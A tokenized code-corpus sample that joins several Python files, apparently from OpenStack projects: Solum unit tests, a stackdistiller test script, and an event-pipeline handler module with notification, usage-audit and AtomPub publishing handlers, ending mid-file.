<s> import json <EOL> import mock <EOL> from solum . api . handlers import infrastructure_handler as infra <EOL> from solum . tests import base <EOL> from solum . tests import fakes <EOL> from solum . tests import utils <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> class TestInfrastructureStackHandler ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInfrastructureStackHandler , self ) . setUp ( ) <EOL> self . ctx = utils . dummy_context ( ) <EOL> def test_get ( self , mock_registry ) : <EOL> mock_registry . InfrastructureStack . get_by_uuid . return_value = { } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . get ( '<STR_LIT>' ) <EOL> self . assertIsNotNone ( res ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' ) <EOL> def test_get_all ( self , mock_registry ) : <EOL> mock_registry . StackList . get_all . return_value = { } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . get_all ( ) <EOL> self . assertIsNotNone ( res ) <EOL> mock_registry . InfrastructureStackList . get_all . assert_called_once_with ( <EOL> self . ctx ) <EOL> def test_update ( self , mock_reg ) : <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . update ( '<STR_LIT>' , data ) <EOL> mock_reg . InfrastructureStack . update_and_save . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' , data ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create ( self , mock_get , mock_clients , mock_registry ) : <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> db_obj = fakes . FakeInfrastructureStack ( ) <EOL> fake_template = json . dumps ( { '<STR_LIT:description>' : '<STR_LIT:test>' } ) <EOL> mock_get . return_value = fake_template <EOL> parameters = { '<STR_LIT:image>' : '<STR_LIT>' } <EOL> mock_registry . InfrastructureStack . return_value = db_obj <EOL> mock_create = mock_clients . return_value . heat . return_value . stacks . create <EOL> mock_create . return_value = { "<STR_LIT>" : { "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] } } <EOL> mock_queue = mock_clients . return_value . zaqar . return_value . queue <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . create ( data ) <EOL> db_obj . update . assert_called_once_with ( data ) <EOL> db_obj . create . assert_called_once_with ( self . ctx ) <EOL> self . assertEqual ( db_obj , res ) <EOL> mock_create . assert_called_once_with ( stack_name = '<STR_LIT>' , <EOL> template = fake_template , <EOL> parameters = parameters ) <EOL> mock_queue . assert_called_once_with ( db_obj . uuid ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_zaqar_queue ( self , mock_clients , mock_registry ) : <EOL> queue_name = '<STR_LIT:test>' <EOL> mock_queue = mock_clients . return_value . zaqar . return_value . queue <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . _create_zaqar_queue ( queue_name ) <EOL> mock_queue . assert_called_once_with ( queue_name ) <EOL> def test_delete ( self , mock_registry ) : <EOL> db_obj = fakes . FakeInfrastructureStack ( ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . return_value = db_obj <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . delete ( '<STR_LIT>' ) <EOL> db_obj . destroy . assert_called_once_with ( self . ctx ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' ) </s>
<s> from solum . objects import registry <EOL> from solum . objects . sqlalchemy import app <EOL> from solum . tests import base <EOL> from solum . tests import utils <EOL> class TestApp ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestApp , self ) . setUp ( ) <EOL> self . db = self . useFixture ( utils . Database ( ) ) <EOL> self . ctx = utils . dummy_context ( ) <EOL> self . data = [ { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . ctx . tenant , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } ] <EOL> utils . create_models_from_data ( app . App , self . data , self . ctx ) <EOL> def test_objects_registered ( self ) : <EOL> self . assertTrue ( registry . App ) <EOL> self . assertTrue ( registry . AppList ) <EOL> def test_get_all ( self ) : <EOL> lst = app . AppList ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( lst . get_all ( self . ctx ) ) ) <EOL> def test_check_data_by_id ( self ) : <EOL> foundapp = app . App ( ) . get_by_id ( self . ctx , self . data [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . data [ <NUM_LIT:0> ] . items ( ) : <EOL> self . assertEqual ( value , getattr ( foundapp , key ) ) <EOL> def test_check_data_by_uuid ( self ) : <EOL> foundapp = app . App ( ) . get_by_uuid ( self . ctx , self . data [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . data [ <NUM_LIT:0> ] . items ( ) : <EOL> self . assertEqual ( value , getattr ( foundapp , key ) ) </s>
<s> import pbr . version <EOL> version_info = pbr . version . VersionInfo ( '<STR_LIT>' ) <EOL> version_string = version_info . version_string </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import json <EOL> import sys <EOL> from stackdistiller import condenser <EOL> from stackdistiller import distiller <EOL> class TestCondenser ( condenser . CondenserBase ) : <EOL> def __init__ ( self ) : <EOL> self . clear ( ) <EOL> def add_trait ( self , name , trait_type , value ) : <EOL> self . traits . append ( distiller . Trait ( name , trait_type , value ) ) <EOL> def add_envelope_info ( self , event_type , message_id , when ) : <EOL> self . event_type = event_type <EOL> self . message_id = message_id <EOL> self . when = when <EOL> def get_event ( self ) : <EOL> return self <EOL> def clear ( self ) : <EOL> self . event_type = None <EOL> self . message_id = None <EOL> self . when = None <EOL> self . traits = [ ] <EOL> def __str__ ( self ) : <EOL> text = [ "<STR_LIT>" % ( self . event_type , <EOL> self . message_id , <EOL> self . when ) ] <EOL> for trait in sorted ( self . traits ) : <EOL> text . append ( "<STR_LIT>" % trait ) <EOL> text . append ( '<STR_LIT>' ) <EOL> return "<STR_LIT:\n>" . join ( text ) <EOL> def test_data ( args ) : <EOL> if not args . test_data : <EOL> n = json . load ( sys . stdin ) <EOL> if args . list : <EOL> for notif in n : <EOL> yield notif <EOL> else : <EOL> yield n <EOL> else : <EOL> for f in args . test_data : <EOL> with open ( f , '<STR_LIT:r>' ) as data : <EOL> n = json . load ( data ) <EOL> if args . list : <EOL> for notif in n : <EOL> yield notif <EOL> else : <EOL> yield n <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = argparse . FileType ( '<STR_LIT:w>' ) , <EOL> default = sys . stdout , help = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , nargs = '<STR_LIT:*>' , metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> config = distiller . load_config ( args . config ) <EOL> out = args . output <EOL> out . write ( "<STR_LIT>" % args . config ) <EOL> notifications = test_data ( args ) <EOL> dist = distiller . Distiller ( config , catchall = args . add_default_definition ) <EOL> nct = <NUM_LIT:0> <EOL> drops = <NUM_LIT:0> <EOL> cond = TestCondenser ( ) <EOL> for notification in notifications : <EOL> cond . clear ( ) <EOL> nct += <NUM_LIT:1> <EOL> if dist . to_event ( notification , cond ) is None : <EOL> out . write ( "<STR_LIT>" % <EOL> notification [ '<STR_LIT>' ] ) <EOL> drops += <NUM_LIT:1> <EOL> else : <EOL> event = cond . get_event ( ) <EOL> out . write ( str ( event ) ) <EOL> out . write ( "<STR_LIT>" ) <EOL> out . write ( "<STR_LIT>" % ( nct , drops ) ) </s>
<s> import abc <EOL> import collections <EOL> import datetime <EOL> import fnmatch <EOL> import json <EOL> import logging <EOL> import six <EOL> import time <EOL> import uuid <EOL> from notabene import kombu_driver as driver <EOL> import requests <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class PipelineHandlerBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def handle_events ( self , events , env ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def commit ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def rollback ( self ) : <EOL> """<STR_LIT>""" <EOL> class LoggingHandler ( PipelineHandlerBase ) : <EOL> def handle_events ( self , events , env ) : <EOL> emsg = '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" % ( event [ '<STR_LIT>' ] , event [ '<STR_LIT>' ] ) <EOL> for event in events ) <EOL> logger . info ( "<STR_LIT>" % ( len ( events ) , emsg ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> class NotabeneException ( Exception ) : <EOL> pass <EOL> class ConnectionManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . pool = { } <EOL> def _extract_params ( self , kw ) : <EOL> host = kw . get ( '<STR_LIT:host>' , '<STR_LIT:localhost>' ) <EOL> user = kw . get ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> password = kw . get ( '<STR_LIT:password>' , '<STR_LIT>' ) <EOL> port = kw . get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> vhost = kw . get ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> library = kw . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> exchange_name = kw . get ( '<STR_LIT>' ) <EOL> exchange_type = kw . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if exchange_name is None : <EOL> raise NotabeneException ( "<STR_LIT>" ) <EOL> connection_dict = { '<STR_LIT:host>' : host , '<STR_LIT:port>' : port , <EOL> '<STR_LIT:user>' : user , '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : library , '<STR_LIT>' : vhost } <EOL> connection_tuple = tuple ( sorted ( connection_dict . items ( ) ) ) <EOL> exchange_dict = { '<STR_LIT>' : exchange_name , <EOL> '<STR_LIT>' : exchange_type } <EOL> exchange_tuple = tuple ( sorted ( exchange_dict . items ( ) ) ) <EOL> return ( connection_dict , connection_tuple , <EOL> exchange_dict , exchange_tuple ) <EOL> def get_connection ( self , properties , queue_name ) : <EOL> ( connection_dict , connection_tuple , <EOL> exchange_dict , exchange_tuple ) = self . _extract_params ( properties ) <EOL> connection_info = self . pool . get ( connection_tuple ) <EOL> if connection_info is None : <EOL> connection = driver . create_connection ( connection_dict [ '<STR_LIT:host>' ] , <EOL> connection_dict [ '<STR_LIT:port>' ] , <EOL> connection_dict [ '<STR_LIT:user>' ] , <EOL> connection_dict [ '<STR_LIT:password>' ] , <EOL> connection_dict [ '<STR_LIT>' ] , <EOL> connection_dict [ '<STR_LIT>' ] ) <EOL> connection_info = ( connection , { } ) <EOL> self . pool [ connection_tuple ] = connection_info <EOL> connection , exchange_pool = connection_info <EOL> exchange = exchange_pool . get ( exchange_tuple ) <EOL> if exchange is None : <EOL> exchange = driver . create_exchange ( exchange_dict [ '<STR_LIT>' ] , <EOL> exchange_dict [ '<STR_LIT>' ] ) <EOL> exchange_pool [ exchange_tuple ] = exchange <EOL> queue = driver . create_queue ( queue_name , exchange , queue_name , <EOL> channel = connection . channel ( ) ) <EOL> queue . declare ( ) <EOL> return ( connection , exchange ) <EOL> connection_manager = ConnectionManager ( ) <EOL> class NotabeneHandler ( PipelineHandlerBase ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( NotabeneHandler , self ) . __init__ ( ** kw ) <EOL> global connection_manager <EOL> self . queue_name = kw . get ( '<STR_LIT>' ) <EOL> if self . queue_name is None : <EOL> raise NotabeneException ( "<STR_LIT>" ) <EOL> self . connection , self . exchange = connection_manager . get_connection ( <EOL> kw , self . queue_name ) <EOL> self . env_keys = kw . get ( '<STR_LIT>' , [ ] ) <EOL> def handle_events ( self , events , env ) : <EOL> keys = [ key for key in self . env_keys ] <EOL> self . pending_notifications = [ ] <EOL> for key in keys : <EOL> self . pending_notifications . extend ( env . get ( key , [ ] ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> for notification in self . pending_notifications : <EOL> logger . info ( "<STR_LIT>" % <EOL> ( notification [ '<STR_LIT>' ] , self . exchange , <EOL> self . queue_name ) ) <EOL> try : <EOL> driver . send_notification ( notification , self . queue_name , <EOL> self . connection , self . exchange ) <EOL> except Exception as e : <EOL> logger . exception ( e ) <EOL> def rollback ( self ) : <EOL> pass <EOL> class UsageException ( Exception ) : <EOL> def __init__ ( self , code , message ) : <EOL> super ( UsageException , self ) . __init__ ( message ) <EOL> self . code = code <EOL> class UsageHandler ( PipelineHandlerBase ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( UsageHandler , self ) . __init__ ( ** kw ) <EOL> self . warnings = [ ] <EOL> def _get_audit_period ( self , event ) : <EOL> apb = event . get ( '<STR_LIT>' ) <EOL> ape = event . get ( '<STR_LIT>' ) <EOL> return apb , ape <EOL> def _is_exists ( self , event ) : <EOL> return event [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def _is_non_EOD_exists ( self , event ) : <EOL> apb , ape = self . _get_audit_period ( event ) <EOL> return ( self . _is_exists ( event ) and apb and ape <EOL> and ape . date ( ) != ( apb . date ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) ) ) <EOL> def _is_EOD_exists ( self , event ) : <EOL> apb , ape = self . _get_audit_period ( event ) <EOL> return ( self . _is_exists ( event ) and apb and ape <EOL> and apb . time ( ) == datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> and ape . time ( ) == datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> and ape . date ( ) == ( apb . date ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) ) ) <EOL> def _extract_launched_at ( self , exists ) : <EOL> if not exists . get ( '<STR_LIT>' ) : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return exists [ '<STR_LIT>' ] <EOL> def _extract_interesting_events ( self , events , interesting ) : <EOL> return [ event for event in events <EOL> if event [ '<STR_LIT>' ] in interesting ] <EOL> def _find_deleted_events ( self , events ) : <EOL> interesting = [ '<STR_LIT>' ] <EOL> return self . _extract_interesting_events ( events , interesting ) <EOL> def _verify_fields ( self , this , that , fields ) : <EOL> for field in fields : <EOL> if field not in this and field not in that : <EOL> continue <EOL> if this [ field ] != that [ field ] : <EOL> raise UsageException ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % ( field , this [ field ] , that [ field ] ) ) <EOL> def _confirm_delete ( self , exists , delete_events , fields ) : <EOL> deleted_at = exists . get ( '<STR_LIT>' ) <EOL> state = exists . get ( '<STR_LIT:state>' ) <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> if not deleted_at and delete_events : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if deleted_at and state != "<STR_LIT>" : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if deleted_at and not delete_events : <EOL> launched_at = exists . get ( '<STR_LIT>' ) <EOL> if deleted_at < launched_at : <EOL> raise UsageException ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if ( apb and ape and deleted_at >= apb and deleted_at <= ape ) : <EOL> raise UsageException ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( delete_events ) > <NUM_LIT:1> : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if delete_events : <EOL> self . _verify_fields ( exists , delete_events [ - <NUM_LIT:1> ] , fields ) <EOL> def _confirm_launched_at ( self , block , exists ) : <EOL> if exists . get ( '<STR_LIT:state>' ) != '<STR_LIT>' : <EOL> return <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> launched_at = self . _extract_launched_at ( exists ) <EOL> if apb and ape and apb <= launched_at <= ape and len ( block ) == <NUM_LIT:0> : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def _get_core_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _do_checks ( self , block , exists ) : <EOL> interesting = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _confirm_launched_at ( block , exists ) <EOL> fields = self . _get_core_fields ( ) <EOL> last_interesting = None <EOL> for event in block : <EOL> if event [ '<STR_LIT>' ] in interesting : <EOL> last_interesting = event <EOL> if last_interesting : <EOL> self . _verify_fields ( last_interesting , exists , fields ) <EOL> elif self . _is_non_EOD_exists ( exists ) : <EOL> self . warnings . append ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> exists [ '<STR_LIT>' ] ) <EOL> deleted = self . _find_deleted_events ( block ) <EOL> delete_fields = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _confirm_delete ( exists , deleted , delete_fields ) <EOL> def _base_notification ( self , exists ) : <EOL> basen = exists . copy ( ) <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = '<STR_LIT:0>' <EOL> basen [ '<STR_LIT>' ] = exists . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return basen <EOL> def _generate_new_id ( self , original_message_id , event_type ) : <EOL> if original_message_id : <EOL> oid = uuid . UUID ( original_message_id ) <EOL> return uuid . uuid5 ( oid , event_type ) <EOL> else : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % event_type ) <EOL> return uuid . uuid4 ( ) <EOL> def _process_block ( self , block , exists ) : <EOL> error = None <EOL> try : <EOL> self . _do_checks ( block , exists ) <EOL> event_type = "<STR_LIT>" <EOL> except UsageException as e : <EOL> error = e <EOL> event_type = "<STR_LIT>" <EOL> logger . warn ( "<STR_LIT>" % <EOL> ( self . stream_id , e . code , e ) ) <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> logger . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . stream_id , exists . get ( "<STR_LIT>" ) , <EOL> exists . get ( "<STR_LIT>" ) , exists . get ( "<STR_LIT:state>" ) , <EOL> apb , ape , len ( block ) ) ) <EOL> if len ( block ) > <NUM_LIT:1> : <EOL> logger . warn ( "<STR_LIT>" <EOL> % ( event_type , self . stream_id ) ) <EOL> for event in block : <EOL> logger . warn ( "<STR_LIT>" % <EOL> ( event [ '<STR_LIT>' ] , event [ '<STR_LIT>' ] ) ) <EOL> events = [ ] <EOL> if self . warnings : <EOL> instance_id = exists . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> warning_event = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( uuid . uuid4 ( ) ) , <EOL> '<STR_LIT>' : exists . get ( <EOL> '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT>' : instance_id , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( self . warnings ) } <EOL> events . append ( warning_event ) <EOL> new_event = self . _base_notification ( exists ) <EOL> new_event [ '<STR_LIT>' ] = self . _generate_new_id ( <EOL> new_event [ '<STR_LIT>' ] , event_type ) <EOL> new_event . update ( { '<STR_LIT>' : event_type , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : exists . get ( '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT:error>' : str ( error ) , <EOL> '<STR_LIT>' : error and error . code } ) <EOL> events . append ( new_event ) <EOL> return events <EOL> def handle_events ( self , events , env ) : <EOL> self . env = env <EOL> self . stream_id = env [ '<STR_LIT>' ] <EOL> self . warnings = [ ] <EOL> new_events = [ ] <EOL> block = [ ] <EOL> for event in events : <EOL> if self . _is_exists ( event ) : <EOL> new_events . extend ( self . _process_block ( block , event ) ) <EOL> block = [ ] <EOL> else : <EOL> block . append ( event ) <EOL> if block : <EOL> new_event = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : str ( uuid . uuid4 ( ) ) , <EOL> '<STR_LIT>' : block [ <NUM_LIT:0> ] . get ( '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT>' : block [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT:error>' : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> new_events . append ( new_event ) <EOL> return events + new_events <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> class AtomPubException ( Exception ) : <EOL> pass <EOL> cuf_template = ( """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" ) <EOL> class AtomPubHandler ( PipelineHandlerBase ) : <EOL> auth_token_cache = None <EOL> def __init__ ( self , url , event_types = None , extra_info = None , <EOL> content_format = '<STR_LIT>' , title = None , categories = None , <EOL> auth_user = '<STR_LIT>' , auth_key = '<STR_LIT>' , auth_server = '<STR_LIT>' , <EOL> wait_interval = <NUM_LIT:30> , max_wait = <NUM_LIT> , http_timeout = <NUM_LIT> , ** kw ) : <EOL> super ( AtomPubHandler , self ) . __init__ ( ** kw ) <EOL> self . events = [ ] <EOL> self . included_types = [ ] <EOL> self . excluded_types = [ ] <EOL> self . url = url <EOL> self . auth_user = auth_user <EOL> self . auth_key = auth_key <EOL> self . auth_server = auth_server <EOL> self . wait_interval = wait_interval <EOL> self . max_wait = max_wait <EOL> self . http_timeout = http_timeout <EOL> self . content_format = content_format <EOL> self . title = title <EOL> self . categories = categories <EOL> if extra_info : <EOL> self . extra_info = extra_info <EOL> else : <EOL> self . extra_info = { } <EOL> if event_types : <EOL> if isinstance ( event_types , six . string_types ) : <EOL> event_types = [ event_types ] <EOL> for t in event_types : <EOL> if t . startswith ( '<STR_LIT:!>' ) : <EOL> self . excluded_types . append ( t [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> self . included_types . append ( t ) <EOL> else : <EOL> self . included_types . append ( '<STR_LIT:*>' ) <EOL> if self . excluded_types and not self . included_types : <EOL> self . included_types . append ( '<STR_LIT:*>' ) <EOL> def _included_type ( self , event_type ) : <EOL> return any ( fnmatch . fnmatch ( event_type , t ) for t in self . included_types ) <EOL> def _excluded_type ( self , event_type ) : <EOL> return any ( fnmatch . fnmatch ( event_type , t ) for t in self . excluded_types ) <EOL> def match_type ( self , event_type ) : <EOL> return ( self . _included_type ( event_type ) <EOL> and not self . _excluded_type ( event_type ) ) <EOL> def handle_events ( self , events , env ) : <EOL> for event in events : <EOL> event_type = event [ '<STR_LIT>' ] <EOL> if self . match_type ( event_type ) : <EOL> self . events . append ( event ) <EOL> logger . debug ( "<STR_LIT>" % len ( self . events ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> for event in self . events : <EOL> event_type = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> message_id = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> status = self . publish_event ( event ) <EOL> logger . debug ( "<STR_LIT>" % ( event_type , <EOL> message_id , <EOL> status ) ) <EOL> except Exception : <EOL> original_message_id = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . exception ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( event_type , <EOL> message_id , <EOL> original_message_id ) ) <EOL> def publish_event ( self , event ) : <EOL> content , content_type = self . format ( event ) <EOL> event_type = self . get_event_type ( event . get ( '<STR_LIT>' ) ) <EOL> atom = self . generate_atom ( event , event_type , content , content_type , <EOL> title = self . title , categories = self . categories ) <EOL> logger . debug ( "<STR_LIT>" % atom ) <EOL> return self . _send_event ( atom ) <EOL> def generate_atom ( self , event , event_type , content , content_type , <EOL> categories = None , title = None ) : <EOL> template = ( """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" ) <EOL> if title is None : <EOL> title = event_type <EOL> if categories is None : <EOL> cats = [ ] <EOL> else : <EOL> cats = categories [ : ] <EOL> cats . append ( event_type ) <EOL> original_message_id = event . get ( '<STR_LIT>' ) <EOL> if original_message_id is not None : <EOL> cats . append ( '<STR_LIT>' % original_message_id ) <EOL> cattags = '<STR_LIT>' . join ( """<STR_LIT>""" % cat <EOL> for cat in cats ) <EOL> info = dict ( message_id = event . get ( '<STR_LIT>' ) , <EOL> original_message_id = original_message_id , <EOL> event = event , <EOL> event_type = event_type , <EOL> content = content , <EOL> categories = cattags , <EOL> title = title , <EOL> content_type = content_type ) <EOL> return template % info <EOL> def get_event_type ( self , event_type ) : <EOL> etf = getattr ( self , '<STR_LIT>' % self . content_format , None ) <EOL> if etf : <EOL> return etf ( event_type ) <EOL> return event_type <EOL> def event_type_cuf_xml ( self , event_type ) : <EOL> return event_type + "<STR_LIT>" <EOL> def format ( self , event ) : <EOL> eff = getattr ( self , '<STR_LIT>' % self . content_format , None ) <EOL> if eff is None : <EOL> eff = getattr ( self , '<STR_LIT>' ) <EOL> return eff ( event ) <EOL> def format_json ( self , event ) : <EOL> c = json . dumps ( event ) <EOL> return ( c , '<STR_LIT:application/json>' ) <EOL> def format_cuf_xml ( self , event ) : <EOL> tvals = collections . defaultdict ( lambda : '<STR_LIT>' ) <EOL> tvals . update ( event ) <EOL> tvals . update ( self . extra_info ) <EOL> start_time , end_time = self . _get_times ( event ) <EOL> tvals [ '<STR_LIT>' ] = self . _format_time ( start_time ) <EOL> tvals [ '<STR_LIT>' ] = self . _format_time ( end_time ) <EOL> tvals [ '<STR_LIT:status>' ] = self . _get_status ( event ) <EOL> tvals [ '<STR_LIT>' ] = self . _get_options ( event ) <EOL> c = cuf_template % tvals <EOL> return ( c , '<STR_LIT>' ) <EOL> def _get_options ( self , event ) : <EOL> opt = int ( event . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> flags = [ bool ( opt & ( <NUM_LIT:2> ** i ) ) for i in range ( <NUM_LIT:8> ) ] <EOL> os = '<STR_LIT>' <EOL> app = None <EOL> if flags [ <NUM_LIT:0> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:2> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:6> ] : <EOL> os = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:3> ] : <EOL> app = '<STR_LIT>' <EOL> if flags [ <NUM_LIT:5> ] : <EOL> app = '<STR_LIT>' <EOL> if app is None : <EOL> return '<STR_LIT>' % os <EOL> else : <EOL> return '<STR_LIT>' % ( os , app ) <EOL> def _get_status ( self , event ) : <EOL> state = event . get ( '<STR_LIT:state>' ) <EOL> state_description = event . get ( '<STR_LIT>' ) <EOL> status = '<STR_LIT>' <EOL> status_map = { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:error>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , 